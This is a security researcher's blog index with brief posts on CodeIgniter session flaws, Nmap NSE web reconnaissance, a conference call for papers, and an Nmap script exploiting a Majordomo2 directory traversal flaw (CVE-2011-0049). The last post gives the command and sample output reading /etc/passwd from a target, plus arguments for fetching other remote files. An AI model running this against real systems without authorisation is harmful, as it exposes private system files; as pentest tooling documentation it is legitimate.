Web security

(IN)seguridad de datos de sesion en CodeIgniter

by calderpwn on Sun, Jul 07 2013 16:12:00

En el último año revisé algunas aplicaciones web hechas con CodeIgniter y después de ver los mismos errores una y otra vez he decidido escribir un pequeño post. Espero les sirva de referencia a ustedes pentesters y programadores que usan este framework.

Lean el artículo desde el sitio de websec: http://www.websec.mx/blog/ver/inseguridad-datos-sesion-codeigniter

Gathering Web Server Information with Nmap NSE

by calderpwn on Wed, Jul 03 2013 09:13:00

I wanted to share an article I wrote for a shady e-magazine two years ago:

http://calderonpale.com/uploads/NSE_Information_gathering.pdf

GuadalajaraCON: Call For Papers

by Paulino Calderon on Tue, Feb 14 2012 18:46:00
Ya salió el Call For Papers del GuadalajaraCON http://guadalajaracon.org . Aquí se los dejo para los que quieran compartir información en este evento. http://www.guadalajaracon.org/call-for-papers/

Web pentesting with Nmap NSE

by Paulino Calderon on Thu, Dec 29 2011 04:31:00

A few months ago I submitted an article to Pentest Magazine called "Gathering web server information with Nmap NSE".

Pentest magazine extra coverExcerpt

HTTP response analysis with Nmap

Widely used protocols are always at the mercy of the
developers implementing it and HTTP is no exception.
Specially crafted requests make web servers behave in
its own way and this allow us to do some nifty tricks to
fingerprint them.

Exploiting Majordomo2 with Nmap

by Paulino Calderon on Tue, Jun 28 2011 18:42:00

This is my nmap script http-majordomo2-dir-traversal, it exploits a directory traversal vulnerability in Majordomo2 (CVE-2011-0049). Update your Nmap repository to try it  Smile

Usage

nmap -p80 --script http-majordomo2-dir-traversal <host/ip>

Output

PORT STATE SERVICE

  80/tcp open  http    syn-ack
| http-majordomo2-dir-traversal: /etc/passwd was found:
| 
| root:x:0:0:root:/root:/bin/bash
| bin:x:1:1:bin:/bin:/sbin/nologin

Arguments

  • http-majordomo2-dir-traversal.rfile - Remote file to download. Default: /etc/passwd
  • http-majordomo2-dir-traversal.uri - URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr
  • http-majordomo2-dir-traversal.outfile - If set it saves the remote file to this location.

 

Official Documentation

http://nmap.org/nsedoc/scripts/http-majordomo2-dir-traversal.html

Download

http://nmap.org/svn/scripts/http-majordomo2-dir-traversal.nse

1 | 2